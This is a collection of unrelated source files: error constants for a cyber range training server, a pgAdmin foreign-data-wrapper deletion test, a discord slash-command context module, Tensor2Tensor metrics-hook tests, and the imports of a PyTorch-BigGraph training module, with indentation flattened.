USER_PASSWORD_MISSING_ERROR = "User password is missing"
USER_PASSWORD_NOT_IN_DATABASE_ERROR = "User password not in database"
USER_ID_PASSWORD_INVALID_ERROR = "User id and/or password are invalid"
ACTION_MISSING_ERROR = "Action is missing"
ACTION_INVALID_ERROR = "Action is invalid"
LANGUAGE_MISSING_ERROR = "Language is missing"
LANGUAGE_INVALID_ERROR = "Language is invalid"
TRAINING_SETTINGS_LOADING_ERROR = "Server could not load the training settings database"
INSTANCE_COUNT_MISSING_ERROR = "Instance count is missing"
INSTANCE_COUNT_INVALID_ERROR = "Instance count is invalid"
TRAINING_TYPE_MISSING_ERROR = "Training type is invalid or missing"
SCENARIO_NAME_MISSING_ERROR = "Scenario name is missing"
LEVEL_NAME_MISSING_ERROR = "Level name is missing"
SESSION_ALLOCATION_ERROR = "Server could not allocate a new session (maximum number reached)"
CONTENT_IDENTIFICATION_ERROR = "Server could not determine the training content for the specified scenario and level"
CONTENT_LOADING_ERROR = "Server could not load the training content"
CONTENT_UPLOAD_ERROR = "LMS content manager could not upload the training content"
CONTENT_REMOVAL_ERROR = "LMS content manager could not remove the training activity"
CONTENT_SERVER_ERROR = "Server could not communicate with the LMS content manager"
TEMPLATE_IDENTIFICATION_ERROR = "Server could not determine the cyber range template for the specified scenario and level"
TEMPLATE_LOADING_ERROR = "Server could not load the cyber range template"
INSTANTIATION_SERVER_ERROR = "Server could not communicate with the cyber range manager"
INSTANTIATION_ERROR = "Cyber range manager could not instantiate the cyber range"
INSTANTIATION_STATUS_FILE_NOT_FOUND = "Instantiation status file could not be found"
INSTANTIATION_CYRIS_IO_ERROR = "CyRIS execution I/O error"
INSTANTIATION_SIMULATED_ERROR = "Simulated range instantiation error"
DESTRUCTION_ERROR = "Cyber range manager could not destroy the cyber range"
DESTRUCTION_SIMULATED_ERROR = "Simulated range destruction error"
DESTRUCTION_SCRIPT_NOT_FOUND = "Destruction script could not be found"
SESSION_ID_MISSING_ERROR = "Session id is missing"
SESSION_ID_INVALID_ERROR = "Session id is invalid"
SESSION_INFO_CONSISTENCY_ERROR = "Server encountered a session information consistency issue"
|
##########################################################################
#
# pgAdmin 4 - PostgreSQL Tools
#
# Copyright (C) 2013 - 2020, The pgAdmin Development Team
# This software is released under the PostgreSQL Licence
#
##########################################################################
from __future__ import print_function
import uuid
import json
from pgadmin.browser.server_groups.servers.databases.tests import \
utils as database_utils
from pgadmin.utils.route import BaseTestGenerator
from regression import parent_node_dict
from regression.python_test_utils import test_utils as utils
from . import utils as fdw_utils
class FDWDDeleteMultipleTestCase(BaseTestGenerator):
"""This class will delete foreign data wrappers under test database."""
skip_on_database = ['gpdb']
scenarios = [ # Fetching default URL for foreign_data_wrapper node.
('Check FDW Node',
dict(url='/browser/foreign_data_wrapper/obj/'))]
def setUp(self):
""" This function will create extension and foreign data wrapper."""
super(FDWDDeleteMultipleTestCase, self).setUp()
self.schema_data = parent_node_dict['schema'][-1]
self.server_id = self.schema_data['server_id']
self.db_id = self.schema_data['db_id']
self.db_name = parent_node_dict["database"][-1]["db_name"]
self.schema_name = self.schema_data['schema_name']
self.fdw_names = ["fdw_{0}".format(str(uuid.uuid4())[1:8]),
"fdw_{0}".format(str(uuid.uuid4())[1:8])]
self.fdw_ids = [fdw_utils.create_fdw(self.server, self.db_name,
self.fdw_names[0]),
fdw_utils.create_fdw(self.server, self.db_name,
self.fdw_names[1])]
def runTest(self):
"""This function will fetch foreign data wrapper present under test
database."""
db_con = database_utils.connect_database(self,
utils.SERVER_GROUP,
self.server_id,
self.db_id)
if not db_con["info"] == "Database connected.":
raise Exception("Could not connect to database.")
fdw_response = fdw_utils.verify_fdw(self.server, self.db_name,
self.fdw_names[0])
if not fdw_response:
raise Exception("Could not find FDW.")
fdw_response = fdw_utils.verify_fdw(self.server, self.db_name,
self.fdw_names[1])
if not fdw_response:
raise Exception("Could not find FDW.")
data = {'ids': self.fdw_ids}
delete_response = self.tester.delete(self.url +
str(utils.SERVER_GROUP) +
'/' + str(self.server_id) + '/' +
str(self.db_id) + '/',
follow_redirects=True,
data=json.dumps(data),
content_type='html/json')
self.assertEquals(delete_response.status_code, 200)
def tearDown(self):
"""This function disconnect the test database and drop added extension
and dependant objects."""
database_utils.disconnect_database(self, self.server_id,
self.db_id)
|
import datetime
import typing
from typing import TYPE_CHECKING
from warnings import warn
import discord
from discord.ext import commands
from discord.utils import snowflake_time
from . import error, http, model
from .dpy_overrides import ComponentMessage
if TYPE_CHECKING: # circular import sucks for typehinting
from . import client
class InteractionContext:
"""
Base context for interactions.\n
    In some ways similar to discord.ext.commands.Context.
.. warning::
Do not manually init this model.
:ivar message: Message that invoked the slash command.
:ivar interaction_id: Interaction ID of the command message.
:ivar bot: discord.py client.
:ivar _http: :class:`.http.SlashCommandRequest` of the client.
:ivar _logger: Logger instance.
:ivar data: The raw data of the interaction.
:ivar values: The values sent with the interaction. Currently for selects.
    :ivar deferred: Whether the command is currently deferred (loading state)
:ivar _deferred_hidden: Internal var to check that state stays the same
:ivar responded: Whether you have responded with a message to the interaction.
:ivar guild_id: Guild ID of the command message. If the command was invoked in DM, then it is ``None``
:ivar author_id: User ID representing author of the command message.
:ivar channel_id: Channel ID representing channel of the command message.
:ivar author: User or Member instance of the command invoke.
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
self._token = _json["token"]
self.message = None
self.menu_messages = None
self.data = _json["data"]
self.interaction_id = _json["id"]
self._http = _http
self.bot = _discord
self._logger = logger
self.deferred = False
self.responded = False
self.values = _json["data"]["values"] if "values" in _json["data"] else None
self._deferred_hidden = False # To check if the patch to the deferred response matches
self.guild_id = int(_json["guild_id"]) if "guild_id" in _json.keys() else None
self.author_id = int(
_json["member"]["user"]["id"] if "member" in _json.keys() else _json["user"]["id"]
)
self.channel_id = int(_json["channel_id"])
if self.guild:
self.author = discord.Member(
data=_json["member"], state=self.bot._connection, guild=self.guild
)
elif self.guild_id:
self.author = discord.User(data=_json["member"]["user"], state=self.bot._connection)
else:
self.author = discord.User(data=_json["user"], state=self.bot._connection)
self.created_at: datetime.datetime = snowflake_time(int(self.interaction_id))
@property
def _deffered_hidden(self):
warn(
"`_deffered_hidden` as been renamed to `_deferred_hidden`.",
DeprecationWarning,
stacklevel=2,
)
return self._deferred_hidden
@_deffered_hidden.setter
def _deffered_hidden(self, value):
warn(
"`_deffered_hidden` as been renamed to `_deferred_hidden`.",
DeprecationWarning,
stacklevel=2,
)
self._deferred_hidden = value
@property
def deffered(self):
warn("`deffered` as been renamed to `deferred`.", DeprecationWarning, stacklevel=2)
return self.deferred
@deffered.setter
def deffered(self, value):
warn("`deffered` as been renamed to `deferred`.", DeprecationWarning, stacklevel=2)
self.deferred = value
@property
def guild(self) -> typing.Optional[discord.Guild]:
"""
Guild instance of the command invoke. If the command was invoked in DM, then it is ``None``
:return: Optional[discord.Guild]
"""
return self.bot.get_guild(self.guild_id) if self.guild_id else None
@property
def channel(self) -> typing.Optional[typing.Union[discord.TextChannel, discord.DMChannel]]:
"""
Channel instance of the command invoke.
:return: Optional[Union[discord.abc.GuildChannel, discord.abc.PrivateChannel]]
"""
return self.bot.get_channel(self.channel_id)
@property
def voice_client(self) -> typing.Optional[discord.VoiceProtocol]:
"""
VoiceClient instance of the command invoke. If the command was invoked in DM, then it is ``None``.
If the bot is not connected to any Voice/Stage channels, then it is ``None``.
:return: Optional[discord.VoiceProtocol]
"""
return self.guild.voice_client if self.guild else None
@property
def me(self) -> typing.Union[discord.Member, discord.ClientUser]:
"""
Bot member instance of the command invoke. If the command was invoked in DM, then it is ``discord.ClientUser``.
:return: Union[discord.Member, discord.ClientUser]
"""
return self.guild.me if self.guild is not None else self.bot.user
async def defer(self, hidden: bool = False):
"""
'Defers' the response, showing a loading state to the user
        :param hidden: Whether the deferred response should be ephemeral. Default ``False``.
"""
if self.deferred or self.responded:
raise error.AlreadyResponded("You have already responded to this command!")
base = {"type": 5}
if hidden:
base["data"] = {"flags": 64}
self._deferred_hidden = True
await self._http.post_initial_response(base, self.interaction_id, self._token)
self.deferred = True
async def send(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
"""
        Sends a response to the interaction.
.. warning::
            - Since Release 1.0.9, this is completely changed. If you are migrating from an older version, please make sure to fix the usage.
- You can't use both ``embed`` and ``embeds`` at the same time, also applies to ``file`` and ``files``.
            - If you send files in the initial response, this will defer the response if it has not been deferred yet, and then PATCH the message in.
:param content: Content of the response.
:type content: str
:param embed: Embed of the response.
:type embed: discord.Embed
:param embeds: Embeds of the response. Maximum 10.
:type embeds: List[discord.Embed]
:param tts: Whether to speak message using tts. Default ``False``.
:type tts: bool
:param file: File to send.
:type file: discord.File
:param files: Files to send.
:type files: List[discord.File]
:param allowed_mentions: AllowedMentions of the message.
:type allowed_mentions: discord.AllowedMentions
        :param hidden: Whether the message is hidden, which means the message content will only be seen by the author.
:type hidden: bool
:param delete_after: If provided, the number of seconds to wait in the background before deleting the message we just sent. If the deletion fails, then it is silently ignored.
:type delete_after: float
:param components: Message components in the response. The top level must be made of ActionRows.
:type components: List[dict]
:return: Union[discord.Message, dict]
"""
if embed and embeds:
raise error.IncorrectFormat("You can't use both `embed` and `embeds`!")
if embed:
embeds = [embed]
if embeds:
if not isinstance(embeds, list):
raise error.IncorrectFormat("Provide a list of embeds.")
elif len(embeds) > 10:
raise error.IncorrectFormat("Do not provide more than 10 embeds.")
if file and files:
raise error.IncorrectFormat("You can't use both `file` and `files`!")
if file:
files = [file]
if delete_after and hidden:
raise error.IncorrectFormat("You can't delete a hidden message!")
if components and not all(comp.get("type") == 1 for comp in components):
raise error.IncorrectFormat(
"The top level of the components list must be made of ActionRows!"
)
if allowed_mentions is not None:
if self.bot.allowed_mentions is not None:
allowed_mentions = self.bot.allowed_mentions.merge(allowed_mentions).to_dict()
else:
allowed_mentions = allowed_mentions.to_dict()
else:
if self.bot.allowed_mentions is not None:
allowed_mentions = self.bot.allowed_mentions.to_dict()
else:
allowed_mentions = {}
base = {
"content": content,
"tts": tts,
"embeds": [x.to_dict() for x in embeds] if embeds else [],
"allowed_mentions": allowed_mentions,
"components": components or [],
}
if hidden:
base["flags"] = 64
initial_message = False
if not self.responded:
initial_message = True
if files and not self.deferred:
await self.defer(hidden=hidden)
if self.deferred:
if self._deferred_hidden != hidden:
self._logger.warning(
"Deferred response might not be what you set it to! (hidden / visible) "
"This is because it was deferred in a different state."
)
resp = await self._http.edit(base, self._token, files=files)
self.deferred = False
else:
json_data = {"type": 4, "data": base}
await self._http.post_initial_response(json_data, self.interaction_id, self._token)
if not hidden:
resp = await self._http.edit({}, self._token)
else:
resp = {}
self.responded = True
else:
resp = await self._http.post_followup(base, self._token, files=files)
if files:
for file in files:
file.close()
if not hidden:
smsg = model.SlashMessage(
state=self.bot._connection,
data=resp,
channel=self.channel or discord.Object(id=self.channel_id),
_http=self._http,
interaction_token=self._token,
)
if delete_after:
self.bot.loop.create_task(smsg.delete(delay=delete_after))
if initial_message:
self.message = smsg
return smsg
else:
return resp
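    # A minimal usage sketch (comments only; `my_embed` is a hypothetical
    # discord.Embed), following the rules documented in the docstring above:
    #
    #     await ctx.defer()                        # optional: show a loading state
    #     msg = await ctx.send("Done!", embed=my_embed)
    #
    # Pass either `embed` or `embeds` (and either `file` or `files`), never both;
    # a hidden (ephemeral) response cannot be combined with `delete_after`.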
async def reply(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
"""
        Sends a response to the interaction. This is currently an alias of the ``.send()`` method.
.. warning::
            - Since Release 1.0.9, this is completely changed. If you are migrating from an older version, please make sure to fix the usage.
- You can't use both ``embed`` and ``embeds`` at the same time, also applies to ``file`` and ``files``.
            - If you send files in the initial response, this will defer the response if it has not been deferred yet, and then PATCH the message in.
:param content: Content of the response.
:type content: str
:param embed: Embed of the response.
:type embed: discord.Embed
:param embeds: Embeds of the response. Maximum 10.
:type embeds: List[discord.Embed]
:param tts: Whether to speak message using tts. Default ``False``.
:type tts: bool
:param file: File to send.
:type file: discord.File
:param files: Files to send.
:type files: List[discord.File]
:param allowed_mentions: AllowedMentions of the message.
:type allowed_mentions: discord.AllowedMentions
        :param hidden: Whether the message is hidden, which means the message content will only be seen by the author.
:type hidden: bool
:param delete_after: If provided, the number of seconds to wait in the background before deleting the message we just sent. If the deletion fails, then it is silently ignored.
:type delete_after: float
:param components: Message components in the response. The top level must be made of ActionRows.
:type components: List[dict]
:return: Union[discord.Message, dict]
"""
return await self.send(
content=content,
embed=embed,
embeds=embeds,
tts=tts,
file=file,
files=files,
allowed_mentions=allowed_mentions,
hidden=hidden,
delete_after=delete_after,
components=components,
)
class SlashContext(InteractionContext):
"""
Context of a slash command. Has all attributes from :class:`InteractionContext`, plus the slash-command-specific ones below.
:ivar name: Name of the command.
:ivar args: List of processed arguments invoked with the command.
:ivar kwargs: Dictionary of processed arguments invoked with the command.
:ivar subcommand_name: Subcommand of the command.
:ivar subcommand_group: Subcommand group of the command.
:ivar command_id: ID of the command.
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
self.name = self.command = self.invoked_with = _json["data"]["name"]
self.args = []
self.kwargs = {}
self.subcommand_name = self.invoked_subcommand = self.subcommand_passed = None
self.subcommand_group = self.invoked_subcommand_group = self.subcommand_group_passed = None
self.command_id = _json["data"]["id"]
super().__init__(_http=_http, _json=_json, _discord=_discord, logger=logger)
@property
def slash(self) -> "client.SlashCommand":
"""
        Returns the associated SlashCommand object created during runtime.
:return: client.SlashCommand
"""
return self.bot.slash # noqa
@property
def cog(self) -> typing.Optional[commands.Cog]:
"""
Returns the cog associated with the command invoked, if any.
:return: Optional[commands.Cog]
"""
cmd_obj = self.slash.commands[self.command]
if isinstance(cmd_obj, (model.CogBaseCommandObject, model.CogSubcommandObject)):
return cmd_obj.cog
else:
return None
async def invoke(self, *args, **kwargs):
"""
Invokes a command with the arguments given.\n
Similar to d.py's `ctx.invoke` function and documentation.\n
.. note::
This does not handle converters, checks, cooldowns, pre-invoke,
or after-invoke hooks in any matter. It calls the internal callback
directly as-if it was a regular function.
You must take care in passing the proper arguments when
using this function.
.. warning::
The first parameter passed **must** be the command being invoked.
            If the command being invoked itself calls `ctx.defer`, do not invoke
            `ctx.defer` before calling this function; an interaction cannot be deferred twice.
:param args: Args for the command.
:param kwargs: Keyword args for the command.
:raises: :exc:`TypeError`
"""
try:
command = args[0]
except IndexError:
raise TypeError("Missing command to invoke.") from None
ret = await self.slash.invoke_command(func=command, ctx=self, args=kwargs)
return ret
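    # A minimal usage sketch (comments only; `other_command` and `some_option`
    # are hypothetical names): forward this context to another registered
    # callback, bypassing checks and converters as noted in the docstring above:
    #
    #     await ctx.invoke(other_command, some_option="value")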
class ComponentContext(InteractionContext):
"""
Context of a component interaction. Has all attributes from :class:`InteractionContext`, plus the component-specific ones below.
:ivar custom_id: The custom ID of the component (has alias component_id).
:ivar component_type: The type of the component.
:ivar component: Component data retrieved from the message. Not available if the origin message was ephemeral.
:ivar origin_message: The origin message of the component. Not available if the origin message was ephemeral.
:ivar origin_message_id: The ID of the origin message.
:ivar selected_options: The options selected (only for selects)
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
self.custom_id = self.component_id = _json["data"]["custom_id"]
self.component_type = _json["data"]["component_type"]
super().__init__(_http=_http, _json=_json, _discord=_discord, logger=logger)
self.origin_message = None
self.origin_message_id = int(_json["message"]["id"]) if "message" in _json.keys() else None
self.component = None
self._deferred_edit_origin = False
if self.origin_message_id and (_json["message"]["flags"] & 64) != 64:
self.origin_message = ComponentMessage(
state=self.bot._connection, channel=self.channel, data=_json["message"]
)
self.component = self.origin_message.get_component(self.custom_id)
self.selected_options = None
if self.component_type == 3:
self.selected_options = _json["data"].get("values", [])
async def defer(self, hidden: bool = False, edit_origin: bool = False, ignore: bool = False):
"""
'Defers' the response, showing a loading state to the user
:param hidden: Whether the deferred response should be ephemeral. Default ``False``.
        :param edit_origin: Whether the deferral edits the origin message. If ``False``, the deferred response will be for a follow-up message. Defaults to ``False``.
        :param ignore: Whether to just ignore and not edit or send a response. Using this can avoid showing the interaction loading state. Defaults to ``False``.
"""
if self.deferred or self.responded:
raise error.AlreadyResponded("You have already responded to this command!")
base = {"type": 6 if edit_origin or ignore else 5}
if edit_origin and ignore:
raise error.IncorrectFormat("'edit_origin' and 'ignore' are mutually exclusive")
if hidden:
if edit_origin:
raise error.IncorrectFormat(
"'hidden' and 'edit_origin' flags are mutually exclusive"
)
elif ignore:
self._deferred_hidden = True
else:
base["data"] = {"flags": 64}
self._deferred_hidden = True
self._deferred_edit_origin = edit_origin
await self._http.post_initial_response(base, self.interaction_id, self._token)
self.deferred = not ignore
if ignore:
self.responded = True
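    # A minimal usage sketch (comments only) of the flag combinations accepted
    # by the defer() call above, per its mutual-exclusion checks:
    #
    #     await ctx.defer()                   # loading state, follow-up response
    #     await ctx.defer(hidden=True)        # loading state, ephemeral follow-up
    #     await ctx.defer(edit_origin=True)   # defer an edit of the origin message
    #     await ctx.defer(ignore=True)        # acknowledge without a loading state
    #
    # `hidden` cannot be combined with `edit_origin`, and `edit_origin` cannot be
    # combined with `ignore`.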
async def send(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
if self.deferred and self._deferred_edit_origin:
self._logger.warning(
"Deferred response might not be what you set it to! (edit origin / send response message) "
"This is because it was deferred with different response type."
)
return await super().send(
content,
embed=embed,
embeds=embeds,
tts=tts,
file=file,
files=files,
allowed_mentions=allowed_mentions,
hidden=hidden,
delete_after=delete_after,
components=components,
)
async def edit_origin(self, **fields):
"""
Edits the origin message of the component.
Refer to :meth:`discord.Message.edit` and :meth:`InteractionContext.send` for fields.
"""
_resp = {}
try:
content = fields["content"]
except KeyError:
pass
else:
if content is not None:
content = str(content)
_resp["content"] = content
try:
components = fields["components"]
except KeyError:
pass
else:
if components is None:
_resp["components"] = []
else:
_resp["components"] = components
try:
embeds = fields["embeds"]
except KeyError:
# Nope
pass
else:
if not isinstance(embeds, list):
raise error.IncorrectFormat("Provide a list of embeds.")
if len(embeds) > 10:
raise error.IncorrectFormat("Do not provide more than 10 embeds.")
_resp["embeds"] = [e.to_dict() for e in embeds]
try:
embed = fields["embed"]
except KeyError:
pass
else:
if "embeds" in _resp:
raise error.IncorrectFormat("You can't use both `embed` and `embeds`!")
if embed is None:
_resp["embeds"] = []
else:
_resp["embeds"] = [embed.to_dict()]
file = fields.get("file")
files = fields.get("files")
if files is not None and file is not None:
raise error.IncorrectFormat("You can't use both `file` and `files`!")
if file:
files = [file]
allowed_mentions = fields.get("allowed_mentions")
if allowed_mentions is not None:
if self.bot.allowed_mentions is not None:
_resp["allowed_mentions"] = self.bot.allowed_mentions.merge(
allowed_mentions
).to_dict()
else:
_resp["allowed_mentions"] = allowed_mentions.to_dict()
else:
if self.bot.allowed_mentions is not None:
_resp["allowed_mentions"] = self.bot.allowed_mentions.to_dict()
else:
_resp["allowed_mentions"] = {}
if not self.responded:
if files and not self.deferred:
await self.defer(edit_origin=True)
if self.deferred:
if not self._deferred_edit_origin:
self._logger.warning(
"Deferred response might not be what you set it to! (edit origin / send response message) "
"This is because it was deferred with different response type."
)
_json = await self._http.edit(_resp, self._token, files=files)
self.deferred = False
else: # noqa: F841
json_data = {"type": 7, "data": _resp}
_json = await self._http.post_initial_response( # noqa: F841
json_data, self.interaction_id, self._token
)
self.responded = True
else:
raise error.IncorrectFormat("Already responded")
if files:
for file in files:
file.close()
# Commented out for now as sometimes (or at least, when not deferred) _json is an empty string?
# self.origin_message = ComponentMessage(state=self.bot._connection, channel=self.channel,
# data=_json)
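    # A minimal usage sketch (comments only; the content string is hypothetical):
    # inside a component callback, the origin message can be updated in place with
    #
    #     await ctx.edit_origin(content="Selection received!", components=[])
    #
    # subject to the same field rules as send() (either `embed` or `embeds`, etc.).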
class MenuContext(InteractionContext):
"""
Context of a context menu interaction. Has all attributes from :class:`InteractionContext`, plus the context-specific ones below.
:ivar context_type: The type of context menu command.
:ivar _resolved: The data set for the context menu.
:ivar target_message: The targeted message of the context menu command if present. Defaults to ``None``.
:ivar target_id: The target ID of the context menu command.
:ivar target_author: The author targeted from the context menu command.
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
super().__init__(_http=_http, _json=_json, _discord=_discord, logger=logger)
self.context_type = _json["type"]
self._resolved = self.data["resolved"] if "resolved" in self.data.keys() else None
self.target_message = None
self.target_author = None
self.target_id = self.data["target_id"]
if self._resolved is not None:
try:
if self._resolved["messages"]:
_msg = [msg for msg in self._resolved["messages"]][0]
self.target_message = model.SlashMessage(
state=self.bot._connection,
channel=_discord.get_channel(self.channel_id),
data=self._resolved["messages"][_msg],
_http=_http,
interaction_token=self._token,
)
except KeyError: # noqa
pass
try:
if self.guild and self._resolved["members"]:
_auth = [auth for auth in self._resolved["members"]][0]
self.target_author = discord.Member(
data=self._resolved["members"][_auth],
state=self.bot._connection,
guild=self.guild,
)
else:
_auth = [auth for auth in self._resolved["users"]][0]
self.target_author = discord.User(
data=self._resolved["users"][_auth], state=self.bot._connection
)
except KeyError: # noqa
pass
@property
def cog(self) -> typing.Optional[commands.Cog]:
"""
Returns the cog associated with the command invoked, if any.
:return: Optional[commands.Cog]
"""
cmd_obj = self.slash.commands[self.command]
if isinstance(cmd_obj, (model.CogBaseCommandObject, model.CogSubcommandObject)):
return cmd_obj.cog
else:
return None
async def defer(self, hidden: bool = False, edit_origin: bool = False, ignore: bool = False):
"""
'Defers' the response, showing a loading state to the user
:param hidden: Whether the deferred response should be ephemeral. Default ``False``.
        :param edit_origin: Whether the deferral edits the origin message. If ``False``, the deferred response will be for a follow-up message. Defaults to ``False``.
        :param ignore: Whether to just ignore and not edit or send a response. Using this can avoid showing the interaction loading state. Defaults to ``False``.
"""
if self.deferred or self.responded:
raise error.AlreadyResponded("You have already responded to this command!")
base = {"type": 6 if edit_origin or ignore else 5}
if edit_origin and ignore:
raise error.IncorrectFormat("'edit_origin' and 'ignore' are mutually exclusive")
if hidden:
if edit_origin:
raise error.IncorrectFormat(
"'hidden' and 'edit_origin' flags are mutually exclusive"
)
elif ignore:
self._deferred_hidden = True
else:
base["data"] = {"flags": 64}
self._deferred_hidden = True
self._deferred_edit_origin = edit_origin
await self._http.post_initial_response(base, self.interaction_id, self._token)
self.deferred = not ignore
if ignore:
self.responded = True
async def send(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
if self.deferred and self._deferred_edit_origin:
self._logger.warning(
"Deferred response might not be what you set it to! (edit origin / send response message) "
"This is because it was deferred with different response type."
)
return await super().send(
content,
embed=embed,
embeds=embeds,
tts=tts,
file=file,
files=files,
allowed_mentions=allowed_mentions,
hidden=hidden,
delete_after=delete_after,
components=components,
)
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for metrics_hook."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import shutil
from tensor2tensor.utils import metrics_hook
import tensorflow as tf
class DummyHook(metrics_hook.MetricsBasedHook):
def _process_metrics(self, global_step, metrics):
if metrics:
assert "" in metrics
assert isinstance(metrics[""], dict)
if metrics[""]:
assert "global_step_1" in metrics[""]
self.test_metrics = metrics
if global_step >= 40:
return True
class MetricsHookTest(tf.test.TestCase):
@classmethod
def setUpClass(cls):
cls.base_checkpoint_dir = tf.test.get_temp_dir()
shutil.rmtree(cls.base_checkpoint_dir, ignore_errors=True)
def ckpt_dir(self, name):
return os.path.join(self.base_checkpoint_dir, name)
@contextlib.contextmanager
def sess(self, hook, ckpt_dir):
with tf.train.MonitoredTrainingSession(
checkpoint_dir=ckpt_dir,
save_checkpoint_secs=0,
save_summaries_steps=10,
hooks=[hook]) as sess:
self._sess = sess
yield sess
def flush(self):
self._sess._hooks[1]._summary_writer.flush()
def testStop(self):
global_step = tf.train.create_global_step()
tf.summary.scalar("global_step", global_step)
incr_global_step = tf.assign_add(global_step, 1)
ckpt_dir = self.ckpt_dir("stop")
dummy = DummyHook(ckpt_dir, every_n_steps=10)
with self.sess(dummy, ckpt_dir) as sess:
for _ in range(20):
sess.run(incr_global_step)
# Summary files should now have 2 global step values in them
self.flush()
# Run for 10 more so that the hook gets triggered again
for _ in range(10):
sess.run(incr_global_step)
# Check that the metrics have actually been collected.
self.assertTrue("" in dummy.test_metrics)
metrics = dummy.test_metrics[""]
self.assertTrue("global_step_1" in metrics)
steps, vals = metrics["global_step_1"]
self.assertTrue(len(steps) == len(vals))
self.assertTrue(len(steps) >= 2)
# Run for 10 more so that the hook triggers stoppage
for _ in range(10):
sess.run(incr_global_step)
with self.assertRaisesRegexp(RuntimeError, "after should_stop requested"):
sess.run(incr_global_step)
def testEarlyStoppingHook(self):
global_step = tf.train.create_global_step()
counter = tf.get_variable("count", initializer=0, dtype=tf.int32)
tf.summary.scalar("count", counter)
incr_global_step = tf.assign_add(global_step, 1)
incr_counter = tf.assign_add(counter, 1)
# Stop if the global step has not gone up by more than 1 in 20 steps.
ckpt_dir = self.ckpt_dir("early")
stop_hook = metrics_hook.EarlyStoppingHook(
ckpt_dir,
"count_1",
num_plateau_steps=20,
plateau_delta=1.,
plateau_decrease=False,
every_n_steps=10)
with self.sess(stop_hook, ckpt_dir) as sess:
for _ in range(20):
sess.run((incr_global_step, incr_counter))
# Summary files should now have 2 values in them
self.flush()
# Run for more steps so that the hook gets triggered and we verify that we
# don't stop.
for _ in range(30):
sess.run((incr_global_step, incr_counter))
self.flush()
# Run without incrementing the counter
for _ in range(40):
sess.run(incr_global_step)
# Metrics should be written such that now the counter has gone >20 steps
# without being incremented.
self.flush()
# Check that we ask for stop
with self.assertRaisesRegexp(RuntimeError, "after should_stop requested"):
for _ in range(30):
sess.run(incr_global_step)
def testPlateauOpHook(self):
global_step = tf.train.create_global_step()
counter = tf.get_variable("count", initializer=0, dtype=tf.int32)
indicator = tf.get_variable("indicator", initializer=0, dtype=tf.int32)
tf.summary.scalar("count", counter)
incr_global_step = tf.assign_add(global_step, 1)
incr_counter = tf.assign_add(counter, 1)
incr_indicator = tf.assign_add(indicator, 1)
# Stop if the global step has not gone up by more than 1 in 20 steps.
ckpt_dir = self.ckpt_dir("plateauop")
stop_hook = metrics_hook.PlateauOpHook(
ckpt_dir,
"count_1",
incr_indicator,
num_plateau_steps=20,
plateau_delta=1.,
plateau_decrease=False,
every_n_steps=10)
with self.sess(stop_hook, ckpt_dir) as sess:
for _ in range(20):
sess.run((incr_global_step, incr_counter))
# Summary files should now have 2 values in them
self.flush()
# Run for more steps so that the hook gets triggered and we verify that we
# don't stop.
for _ in range(30):
sess.run((incr_global_step, incr_counter))
self.flush()
# Run without incrementing the counter
for _ in range(30):
sess.run(incr_global_step)
self.flush()
self.assertTrue(sess.run(indicator) < 1)
# Metrics should be written such that now the counter has gone >20 steps
# without being incremented.
# Check that we run the incr_indicator op several times
for _ in range(3):
for _ in range(10):
sess.run(incr_global_step)
self.flush()
self.assertTrue(sess.run(indicator) > 1)
if __name__ == "__main__":
tf.test.main()
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE.txt file in the root directory of this source tree.
import logging
import math
import time
from collections import defaultdict
from functools import partial
from typing import Any, Callable, Dict, Iterable, List, Optional, Set, Tuple
import torch
import torch.distributed as td
from torch.optim import Optimizer
from torchbiggraph.async_adagrad import AsyncAdagrad
from torchbiggraph.batching import AbstractBatchProcessor, call, process_in_batches
from torchbiggraph.bucket_scheduling import (
BucketStats,
DistributedBucketScheduler,
LockServer,
SingleMachineBucketScheduler,
)
from torchbiggraph.checkpoint_manager import (
CheckpointManager,
ConfigMetadataProvider,
MetadataProvider,
PartitionClient,
)
from torchbiggraph.config import ConfigSchema
from torchbiggraph.distributed import ProcessRanks, init_process_group, start_server
from torchbiggraph.edgelist import EdgeList
from torchbiggraph.eval import RankingEvaluator
from torchbiggraph.graph_storages import EDGE_STORAGES, ENTITY_STORAGES
from torchbiggraph.losses import LOSS_FUNCTIONS, AbstractLossFunction
from torchbiggraph.model import MultiRelationEmbedder, make_model
from torchbiggraph.parameter_sharing import ParameterServer, ParameterSharer
